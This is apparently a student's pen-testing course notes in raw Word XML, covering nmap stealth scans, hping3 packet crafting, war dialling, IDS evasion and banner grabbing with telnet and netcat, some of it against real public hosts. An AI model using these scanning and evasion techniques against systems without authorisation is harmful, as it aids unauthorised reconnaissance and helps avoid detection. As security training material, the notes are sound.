    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Other than SYN, Connect, UDP</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>. These c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r>
        <w:t>run instead of basic scans to try and get round FW</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IDLE Scan</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>Sends messages pretending to be from the IDLE system to the target to try and get a response to see the response to look at packet header information to try and determine what it is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1 192.168.1.22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t>Zombie         Target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XMAS Scan</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve"> – Called a Christmas scan because it lights up a number of header fields in TCP Header like a Christmas tree.</w:t>
      </w:r>
      <w:r w:rsidR="006D23FF">
        <w:t xml:space="preserve"> Trying to identify open ports being filtered by a FW.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIN scan</w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t>will determine if a port if open by the result it receives from sending a FIN flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>You'd run these to try and find open ports that might not have responded to an original SYN scan. The results from these will help determine if there is an open port that just ignores SYN because it might respond to something different.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Packet Craftin</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Utilities </w:t>
      </w:r>
      <w:r w:rsidR="00C31CDA">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HPING</w:t>
      </w:r>
      <w:r w:rsidR="00C31CDA">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00ED7F2D" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>V3 is current.</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> HPING is used for crafting packets to use for evasive tactics to get around FW.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hpin</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>g3 -h</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:tab/>
        <w:t>--brings up the help menu which has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all of the commands written in </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00ED7F2D" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> hping3 192.168.1.1 -U -S -s 55355 -d 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Target           </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:r w:rsidR="00ED7F2D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not sure how but it can help evade IDS and FW. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Can also be used to crash applications as a lot of them are unsure of how to handle malformed packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED7F2D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>packeth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a GUI version of hping3. Runs with Admin priv. Can see all the settings visually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**War dialling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Take a big block of phone numbers and try dialling them all to see if you can pick up a modem. This could be an old backdoor in to the system in case the data network fails. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ToneLoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - is the gold standard in war</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>dialling. Runs under MS DOS. Could be hard to find a copy these days. Plus does anybody even have a mode</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>anymore</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>THC scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> claims to work on everything... hasn't been updated in a very long time. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**IDS Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How to stay stealth. Might have to </w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t xml:space="preserve">do </w:t>
      </w:r>
      <w:r>
        <w:t>this if carrying out a pen test where you are meant to be stealth.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manipulate packets to look a certain way, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31CDA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>paceth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, spoof IP address easily. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31CDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>paceth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to generate a lot of bogus data, then you can hide in the noise created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be set to scan REALLY slow so that hopefully that the IDS won't notice. The threshold won't be reached to trigger alarm. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00573526" w:rsidRDefault="00573526" w:rsidP="00C31CDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LOW and SLOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can put</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t xml:space="preserve"> out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dummy scans to try and throw off the IDS and FW</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Downside of using evasion is it really slows down your </w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t>Being careful and having to h</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> yourself</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t xml:space="preserve"> and your activities</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve"> is very time consuming</w:t>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:t xml:space="preserve"> and with the limited time on a pen test it could hamper your results. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00573526">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- good for web application testing, also includes some IDS evasion. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Throw a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00573526">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan out from a different system while </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>I’m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> doing an nmap scan from my system. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Hopefully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> won't get detected by IDS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any message that an application provides. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can show the version number, patch level, OS in use. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.39 22</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--will try to telnet to port 22 (telnet normally 23) on the host IP. </w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t>This s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hould return a banner with </w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:t>hopefully, some useful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:t xml:space="preserve"> isn't turned on as default on Windows any more. Need to turn the service on</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00230E9E" w:rsidRDefault="00230E9E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230E9E">
        <w:t>is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230E9E">
        <w:t>It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -v www.infiniteskills.com 80</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- connects to www.infiniteskills.com on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>HEAD / H</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E" w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>TTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- RAW http command to access info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>www.infiniteskills.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- have to provide a host in v1.1. This brings up a lot of http info for www.infinitelabs.com. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>What</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kind of server it is on, what OS version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> mx microsoft.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- find out the mail server address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00230E9E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -v mail.messaging.microsoft.com 25</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00230E9E">
        <w:tab/>
      </w:r>
      <w:r>
